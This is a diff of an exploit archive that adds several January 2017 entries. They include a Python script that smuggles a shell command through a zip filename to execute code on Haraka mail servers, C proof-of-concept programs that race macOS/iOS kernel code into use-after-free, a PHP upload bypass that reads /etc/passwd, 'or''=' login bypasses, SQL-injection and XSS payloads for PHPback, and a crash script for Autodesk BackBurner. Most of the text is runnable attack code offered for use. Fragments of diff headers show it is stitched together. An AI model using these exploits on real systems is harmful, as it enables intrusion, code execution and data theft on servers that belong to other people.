-o- by Xychix, 26 January 2017 ---
-o- xychix [at] hotmail.com ---
-o- exploit haraka node.js mailserver <= 2.8.8 (with attachment plugin activated) --
-i- info: https://github.com/haraka/Haraka/pull/1606 (the change that fixed this)
"""
def SendMail(to,mailserver,cmd,mfrom):
msg = MIMEMultipart()
html = "harakiri"
msg['Subject'] = "harakiri"
msg['From'] = mfrom
msg['To'] = to
f = "harakiri.zip"
msg.attach(MIMEText(html))
filename = "harakiri-%s.zip"%datetime.now().strftime("%Y%m%d-%H%M%S")
print("Send harariki to %s, attachment saved as %s, commandline: %s , mailserver %s is used for delivery"%(to,filename,cmd,mailserver))
part = MIMEApplication(CreateZip(cmd,filename),Name="harakiri.zip")
part['Content-Disposition'] = 'attachment; filename="%s"' % "harakiri.zip"
msg.attach(part)
print msg.as_string()
s = smtplib.SMTP(mailserver,25)
try:
resp = s.sendmail(mfrom, to, msg.as_string())
except smtplib.SMTPDataError, err:
if err[0] == 450:
print("[HARAKIRI SUCCESS] SMTPDataError is most likely an error unzipping the archive, which is what we want [%s]"%err[1])
return()
print("smtpd response: %s No errors received"%(resp))
s.close()
return()
class InMemoryZip(object):
def __init__(self):
self.in_memory_zip = StringIO.StringIO()
def append(self, filename_in_zip, file_contents):
zf = zipfile.ZipFile(self.in_memory_zip, "a", zipfile.ZIP_DEFLATED, False)
zf.writestr(filename_in_zip, file_contents)
for zfile in zf.filelist:
zfile.create_system = 0
return self
def read(self):
self.in_memory_zip.seek(0)
return self.in_memory_zip.read()
def writetofile(self, filename):
f = file(filename, "w")
f.write(self.read())
f.close()
def CreateZip(cmd="touch /tmp/harakiri",filename="harakiri.zip"):
z1 = InMemoryZip()
z2 = InMemoryZip()
z2.append("harakiri.txt", banner)
z1.append("a\";%s;echo \"a.zip"%cmd, z2.read())
z1.writetofile(filename)
return(z1.read())
if __name__ == '__main__':
print(banner)
parser = argparse.ArgumentParser(description='Harakiri')
parser.add_argument('-c','--cmd', help='command to run', required=True)
parser.add_argument('-t','--to', help='victim email, mx record must point to vulnerable server', required=True)
parser.add_argument('-m','--mailserver', help='mailserver to talk to, you can consider putting the vuln server here if the mx records aren\'t correct', required=True)
parser.add_argument('-f','--from', help='optional: From email address', required=False, default="harakiri@exploit.db")
args = vars(parser.parse_args())
SendMail(args['to'],args['mailserver'],args['cmd'],args['from'])

View file

@ -0,0 +1,96 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1004
mach_voucher_extract_attr_recipe_trap is a mach trap which can be called from any context
Here's the code:
kern_return_t
mach_voucher_extract_attr_recipe_trap(struct mach_voucher_extract_attr_recipe_args *args)
{
ipc_voucher_t voucher = IV_NULL;
kern_return_t kr = KERN_SUCCESS;
mach_msg_type_number_t sz = 0;
if (copyin(args->recipe_size, (void *)&sz, sizeof(sz))) <---------- (a)
return KERN_MEMORY_ERROR;
if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE)
return MIG_ARRAY_TOO_LARGE;
voucher = convert_port_name_to_voucher(args->voucher_name);
if (voucher == IV_NULL)
return MACH_SEND_INVALID_DEST;
mach_msg_type_number_t __assert_only max_sz = sz;
if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) {
/* keep small recipes on the stack for speed */
uint8_t krecipe[sz];
if (copyin(args->recipe, (void *)krecipe, sz)) {
kr = KERN_MEMORY_ERROR;
goto done;
}
kr = mach_voucher_extract_attr_recipe(voucher, args->key,
(mach_voucher_attr_raw_recipe_t)krecipe, &sz);
assert(sz <= max_sz);
if (kr == KERN_SUCCESS && sz > 0)
kr = copyout(krecipe, (void *)args->recipe, sz);
} else {
uint8_t *krecipe = kalloc((vm_size_t)sz); <---------- (b)
if (!krecipe) {
kr = KERN_RESOURCE_SHORTAGE;
goto done;
}
if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) { <----------- (c)
kfree(krecipe, (vm_size_t)sz);
kr = KERN_MEMORY_ERROR;
goto done;
}
kr = mach_voucher_extract_attr_recipe(voucher, args->key,
(mach_voucher_attr_raw_recipe_t)krecipe, &sz);
assert(sz <= max_sz);
if (kr == KERN_SUCCESS && sz > 0)
kr = copyout(krecipe, (void *)args->recipe, sz);
kfree(krecipe, (vm_size_t)sz);
}
kr = copyout(&sz, args->recipe_size, sizeof(sz));
done:
ipc_voucher_release(voucher);
return kr;
}
Here's the argument structure (controlled from userspace)
struct mach_voucher_extract_attr_recipe_args {
PAD_ARG_(mach_port_name_t, voucher_name);
PAD_ARG_(mach_voucher_attr_key_t, key);
PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe);
PAD_ARG_(user_addr_t, recipe_size);
};
recipe and recipe_size are userspace pointers.
At point (a) four bytes are read from the userspace pointer recipe_size into sz.
At point (b) if sz was less than MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) and greater than MACH_VOUCHER_TRAP_STACK_LIMIT (256)
sz is used to allocate a kernel heap buffer.
At point (c) copyin is called again to copy userspace memory into that buffer which was just allocated, but rather than passing sz (the
validate size which was allocated) args->recipe_size is passed as the size. This is the userspace pointer *to* the size, not the size!
This leads to a completely controlled kernel heap overflow.
Tested on MacOS Sierra 10.12.1 (16B2555)
Exploit for iOS 10.2 iPod Touch 6G 14C92 gets kernel arbitrary r/w
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41163.zip

161
platforms/multiple/dos/41164.c Executable file
View file

@ -0,0 +1,161 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=973
IOService::matchPassive is called when trying to match a request dictionary against a candidate IOService.
We can call this function on a controlled IOService with a controlled matching table OSDictionary via the
io_service_match_property_table_* kernel MIG APIs wrapped by IOServiceMatchPropertyTable.
If a candidate IOService does match against the dictionary but the dictionary also specifies an
"IOParentMatch" key then we reach the following code (in IOService.cpp:)
OSNumber* alternateRegistryID = OSDynamicCast(OSNumber, where->getProperty(kIOServiceLegacyMatchingRegistryIDKey));
if(alternateRegistryID != NULL) {
if(aliasServiceRegIds == NULL)
{
aliasServiceRegIds = OSArray::withCapacity(sizeof(alternateRegistryID));
}
aliasServiceRegIds->setObject(alternateRegistryID);
}
("where" is the controlled IOService.)
getProperty is an IORegistryEntry API which directly calls the getObject method
of the OSDictionary holding the entry's properties. getProperty, unlike copyProperty, doesn't take a reference on
the value of the property which means that there is a short window between
where->getProperty(kIOServiceLegacyMatchingRegistryIDKey)
and
aliasServiceRegIds->setObject(alternateRegistryID)
when if another thread sets a new value for the IOService's "IOServiceLegacyMatchingRegistryID" registry property
the alternateRegistryID OSNumber can be freed. This race condition can be won quite easily and can lead to a virtual call
being performed on a free'd object.
On MacOS IOBluetoothHCIController is one of a number of IOServices which allow an unprivileged user to set the
IOServiceLegacyMatchingRegistryID property.
One approach to fixing this bug would be to call copyProperty instead and drop the ref on the property after adding it
to the aliasServiceRegIds array.
Tested on MacOS Sierra 10.12.1 (16B2555)
*/
// ianbeer
// clang -o iorace iorace.c -framework IOKit -framework CoreFoundation && sync
#if 0
MacOS/iOS kernel use after free due to failure to take reference in IOService::matchPassive
IOService::matchPassive is called when trying to match a request dictionary against a candidate IOService.
We can call this function on a controlled IOService with a controlled matching table OSDictionary via the
io_service_match_property_table_* kernel MIG APIs wrapped by IOServiceMatchPropertyTable.
If a candidate IOService does match against the dictionary but the dictionary also specifies an
"IOParentMatch" key then we reach the following code (in IOService.cpp:)
OSNumber* alternateRegistryID = OSDynamicCast(OSNumber, where->getProperty(kIOServiceLegacyMatchingRegistryIDKey));
if(alternateRegistryID != NULL) {
if(aliasServiceRegIds == NULL)
{
aliasServiceRegIds = OSArray::withCapacity(sizeof(alternateRegistryID));
}
aliasServiceRegIds->setObject(alternateRegistryID);
}
("where" is the controlled IOService.)
getProperty is an IORegistryEntry API which directly calls the getObject method
of the OSDictionary holding the entry's properties. getProperty, unlike copyProperty, doesn't take a reference on
the value of the property which means that there is a short window between
where->getProperty(kIOServiceLegacyMatchingRegistryIDKey)
and
aliasServiceRegIds->setObject(alternateRegistryID)
when if another thread sets a new value for the IOService's "IOServiceLegacyMatchingRegistryID" registry property
the alternateRegistryID OSNumber can be freed. This race condition can be won quite easily and can lead to a virtual call
being performed on a free'd object.
On MacOS IOBluetoothHCIController is one of a number of IOServices which allow an unprivileged user to set the
IOServiceLegacyMatchingRegistryID property.
One approach to fixing this bug would be to call copyProperty instead and drop the ref on the property after adding it
to the aliasServiceRegIds array.
Tested on MacOS Sierra 10.12.1 (16B2555)
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <IOKit/IOKitLib.h>
#include <CoreFoundation/CoreFoundation.h>
io_service_t service = MACH_PORT_NULL;
void* setter(void* arg) {
char number = 1;
CFNumberRef num = CFNumberCreate(kCFAllocatorDefault, kCFNumberCharType, &number);
while(1) {
kern_return_t err;
err = IORegistryEntrySetCFProperty(
service,
CFSTR("IOServiceLegacyMatchingRegistryID"),
num);
if (err != KERN_SUCCESS){
printf("setProperty failed\n");
return NULL;
}
}
return NULL;
}
int main(){
kern_return_t err;
service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOBluetoothHCIController"));
if (service == IO_OBJECT_NULL){
printf("unable to find service\n");
return 0;
}
printf("got service: %x\n", service);
pthread_t thread;
pthread_create(&thread, NULL, setter, NULL);
CFMutableDictionaryRef dict2;
dict2 = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
&kCFTypeDictionaryKeyCallBacks,
&kCFTypeDictionaryValueCallBacks);
CFDictionarySetValue(dict2, CFSTR("key"), CFSTR("value"));
CFMutableDictionaryRef dict;
dict = CFDictionaryCreateMutable(kCFAllocatorDefault, 0,
&kCFTypeDictionaryKeyCallBacks,
&kCFTypeDictionaryValueCallBacks);
CFDictionarySetValue(dict, CFSTR("IOProviderClass"), CFSTR("IOService"));
CFDictionarySetValue(dict, CFSTR("IOResourceMatch"), CFSTR("IOBSD"));
CFDictionarySetValue(dict, CFSTR("IOParentMatch"), dict2);
while(1) {
boolean_t match = 0;
err = IOServiceMatchPropertyTable(service, dict, &match);
if (err != KERN_SUCCESS){
printf("no matches\n");
}
}
pthread_join(thread, NULL);
return 0;
}

103
platforms/multiple/dos/41165.c Executable file
View file

@ -0,0 +1,103 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1034
The task struct has a lock (itk_lock_data, taken via the itk_lock macros) which is supposed to
protect the task->itk_* ports.
The host_self_trap mach trap accesses task->itk_host without taking this lock leading to a use-after-free
given the following interleaving of execution:
Thread A: host_self_trap:
read current_task()->itk_host // Thread A reads itk_host
Thread B: task_set_special_port:
*whichp = port; // Thread B replaces itk_host with eg MACH_PORT_NULL
itk_unlock(task);
if (IP_VALID(old))
ipc_port_release_send(old); // Thread B drops last ref on itk_host
Thread A: host_self_trap:
passes the port to ipc_port_copy_send // uses the free'd port
host_self_trap should use one of the canonical accessors for the task's host port, not just directly read it.
PoC tested on MacOS 10.12.1
*/
// ianbeer
#if 0
iOS/MacOS kernel UaF due to lack of locking in host_self_trap
The task struct has a lock (itk_lock_data, taken via the itk_lock macros) which is supposed to
protect the task->itk_* ports.
The host_self_trap mach trap accesses task->itk_host without taking this lock leading to a use-after-free
given the following interleaving of execution:
Thread A: host_self_trap:
read current_task()->itk_host // Thread A reads itk_host
Thread B: task_set_special_port:
*whichp = port; // Thread B replaces itk_host with eg MACH_PORT_NULL
itk_unlock(task);
if (IP_VALID(old))
ipc_port_release_send(old); // Thread B drops last ref on itk_host
Thread A: host_self_trap:
passes the port to ipc_port_copy_send // uses the free'd port
host_self_trap should use one of the canonical accessors for the task's host port, not just directly read it.
PoC tested on MacOS 10.12.1
#endif
// example boot-args
// debug=0x144 -v pmuflags=1 kdp_match_name=en3 -zp -zc gzalloc_min=120 gzalloc_max=200
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <mach/mach.h>
#include <mach/host_priv.h>
mach_port_t q() {
mach_port_t p = MACH_PORT_NULL;
mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &p);
mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND);
return p;
}
int start = 0;
mach_port_t rq = MACH_PORT_NULL;
void* racer(void* arg) {
for(;;) {
while(!start){;}
usleep(10);
mach_port_t p = mach_host_self();
mach_port_deallocate(mach_task_self(), p);
start = 0;
}
}
int main() {
pthread_t thread;
pthread_create(&thread, NULL, racer, NULL);
for (;;){
mach_port_t p = q();
kern_return_t err = task_set_special_port(mach_task_self(), TASK_HOST_PORT, p);
mach_port_deallocate(mach_task_self(), p);
mach_port_destroy(mach_task_self(), p);
// kernel holds the only ref
start = 1;
task_set_special_port(mach_host_self(), TASK_HOST_PORT, MACH_PORT_NULL);
}
return 0;
}

View file

@ -1,6 +1,7 @@
#!/usr/bin/python3
# CVE-2012-1563: Joomla! <= 2.5.2 Admin Creation
# cf
# Source: https://www.ambionics.io/blog/cve-2016-9838-joomla-account-takeover-and-remote-code-execution
import bs4
import requests

View file

@ -1,6 +1,7 @@
#!/usr/bin/python3
# CVE-2016-9838: Joomla! <= 3.6.4 Admin TakeOver
# cf
# Source: https://www.ambionics.io/blog/cve-2016-9838-joomla-account-takeover-and-remote-code-execution
import bs4
import requests

134
platforms/php/webapps/41159.txt Executable file
View file

@ -0,0 +1,134 @@
[+]################################################################################################
[+] Credits: John Page AKA Hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PEAR-HTTP_UPLOAD-ARBITRARY-FILE-UPLOAD.txt
[+] ISR: ApparitionSEC
[+]################################################################################################
Vendor:
============
pear.php.net
Product:
====================
HTTP_Upload v1.0.0b3
Download:
https://pear.php.net/manual/en/package.http.http-upload.php
Easy and secure managment of files submitted via HTML Forms.
pear install HTTP_Upload
This class provides an advanced file uploader system for file uploads made
from html forms. Features:
* Can handle from one file to multiple files.
* Safe file copying from tmp dir.
* Easy detecting mechanism of valid upload, missing upload or error.
* Gives extensive information about the uploaded file.
* Rename uploaded files in different ways: as it is, safe or unique
* Validate allowed file extensions
* Multiple languages error messages support (es, en, de, fr, it, nl, pt_BR)
Vulnerability Type:
======================
Arbitrary File Upload
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
The package comes with an "upload_example.php" file to test the package,
when uploading a "restricted" PHP file
user will get message like "Unauthorized file transmission".
Line: 488 of "Upload.php"
var $_extensionsCheck = array('php', 'phtm', 'phtml', 'php3', 'inc');
If user does not go thru the "Upload.php" code line by line. They will find
option to set case sensitive check.
e.g. Line: 503 "$_extensionsCaseSensitive"=true
Line: 874
* @param bool $case_sensitive whether extension check is case sensitive.
* When it is case insensitive, the extension
* is lowercased before compared to the array
* of valid extensions.
This setting looks to prevent mixed or uppercase extension on disallowed
PHP file type bypass before uploading.
However, some developers are unaware that "Apache" can process file with
extension like PHP.1, PHP.; etc.
if the last extension is not specified in the list of mime-types known to
the web server.
Therefore, attackers can easily bypass the security check by appending ".1"
to end of the file,
which can result in arbitrary command execution on the affected server.
e.g.
"ext_bypass.php.1" contents:
<?php
echo passthru('cat /etc/passwd');
?>
Sucessfully Tested on: Bitnami wampstack-5.6.29-0.
Server version: Apache/2.4.23 (Win64)
Sucessfully Tested on: XAMPP for Linux 5.6.8-0
Server version: Apache/2.4.12 (Unix)
Disclosure Timeline:
======================================
Vendor Notification: December 31, 2016
Similar bug reported and open 2012
Issue Fixed: January 17, 2017
January 25, 2017 : Public Disclosure
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

17
platforms/php/webapps/41166.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: KB Affiliate Referral PHP Script V1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 26.01.2017
# Vendor Homepage: http://kunals.com/
# Software Download: http://phpscripts.kunals.com/d/item/files/kbaffiliate.rar
# Demo: http://phpscripts.kunals.com/d/item/detail/affiliate/demo/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/index.php?page=act/login and set Username and Password to 'or''=' and hit enter.
# # # # #

17
platforms/php/webapps/41167.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: KB Login Authentication Script V1.1 - Authentication Bypass
# Google Dork: N/A
# Date: 26.01.2017
# Vendor Homepage: http://kunals.com/
# Software Download: http://phpscripts.kunals.com/d/item/files/kblogin.rar
# Demo: http://phpscripts.kunals.com/d/item/detail/login/demo/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/ and set Username and Password to 'or''=' and hit enter.
# # # # #

17
platforms/php/webapps/41168.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: KB Messages PHP Script V1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 26.01.2017
# Vendor Homepage: http://kunals.com/
# Software Download: http://phpscripts.kunals.com/d/item/files/kbmessages.rar
# Demo: http://phpscripts.kunals.com/d/item/detail/messages/demo/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/ and set Username and Password to 'or''=' and hit enter.
# # # # #

17
platforms/php/webapps/41169.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Web Based TimeSheet Script - Authentication Bypass
# Google Dork: N/A
# Date: 26.01.2017
# Vendor Homepage: http://qualitypointtech.net/
# Software Buy: http://www.qualitypointtech.com/webtimesheet/
# Demo: http://qualitypointtech.net/timesheetdemo/index.php
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[beygir]ihsan[nokta]net
# # # # #
# Exploit :
# http://localhost/[PATH]/ and set Username:anything Password:'or''=' and hit enter.
# # # # #

57
platforms/php/webapps/41172.txt Executable file
View file

@ -0,0 +1,57 @@
##################################################################################################
#Exploit Title :PHPback < version 1.3.1 SQL Injection and XSS vulnerability
#Author : Manish Kishan Tanwar AKA error1046 (https://twitter.com/IndiShell1046)
#Date : 27/01/2017
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Tested At : Indishell Lab
##################################################################################################
////////////////////////
/// Overview:
////////////////////////
PHPBack is an open source feedback system and developed on codeigniter framework. There is SQL Injection in search parameter "query" and XSS issue in desc as well as title ppost parameter
////////////////
/// POC ////
///////////////
SQL Injection payload to enumerate tables
----------------------------------------------
http://127.0.0.1/phpback-master/home/search
Post data
query=')%0Aor%0Aextractvalue(6678,concat(0x7e,(select%0Auser()),0x7e))--%0A%23
XSS
----
http://127.0.0.1/phpback-master/home/postidea
Post data
in desc parameter
desc=</textarea><script>alert(document.cookie);</script>
in title parameter
title="><script>alert(document.location);</script>
SQLI Screenshot
https://cloud.githubusercontent.com/assets/10351062/14776703/c9440524-0ae5-11e6-9240-a37a685a72b1.png
XSS screenshot
https://cloud.githubusercontent.com/assets/10351062/14811513/14fbebdc-0bb6-11e6-8ea5-229e2ab71eb8.png
--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,cyber gladiator,Cyber Ace,Golden boy INDIA,d3, rafay baloch, nag256
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3

View file

@ -0,0 +1,90 @@
import sys
import datetime
import socket
import argparse
import os
import time
remote_host = ''
remote_port = ''
def callExit():
print "\n\t\t[!] exiting at %s .....\n" % datetime.datetime.now()
sys.exit(1)
def mySocket():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error:
print 'Failed to create socket'
sys.exit()
print "\n\t[+] Socket Created"
s.connect((remote_host, remote_port))
print "\n\t[+] Socket Connected to %s on port %s" % (remote_host, remote_port)
return s
# 250 backburner 1.0 Ready.
def receiveBanner(s):
banner = s.recv(4096)
print banner
def receiveData(s):
data = s.recv(4096)
print data
def setDataCommand(s):
receiveData(s) # backburner>
print "Set Data Command"
time.sleep(1)
command = "set data\r\n"
try:
s.sendall(command)
except socket.error:
print 'Send failed'
sys.exit()
print "BackBurner Manager should have crashed"
receiveData(s) # 200 Help
receiveData(s) # Available Commands:.....and all set of commands
# backburner>
def main():
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
os.system('clear')
parser = argparse.ArgumentParser(description = 'RCE Autodesk BackBurner')
parser.add_argument('--host', nargs='?', dest='host', required=True, help='remote IP of Autodesk host')
parser.add_argument('--port', nargs='?', dest='port', default=3234, help='remote Port running manager.exe')
args = parser.parse_args()
if args.host == None:
print "\t[!] IP of remote host?"
sys.exit()
global remote_host
global remote_port
remote_host = args.host
remote_port = args.port
print "remote_host: %s" % remote_host
print "remote_port: %s" % remote_port
s = mySocket()
receiveBanner(s)
setDataCommand(s)
print 'exit'
sys.exit()
if __name__ == '__main__':
try: sys.exit(main())
except KeyboardInterrupt:
callExit()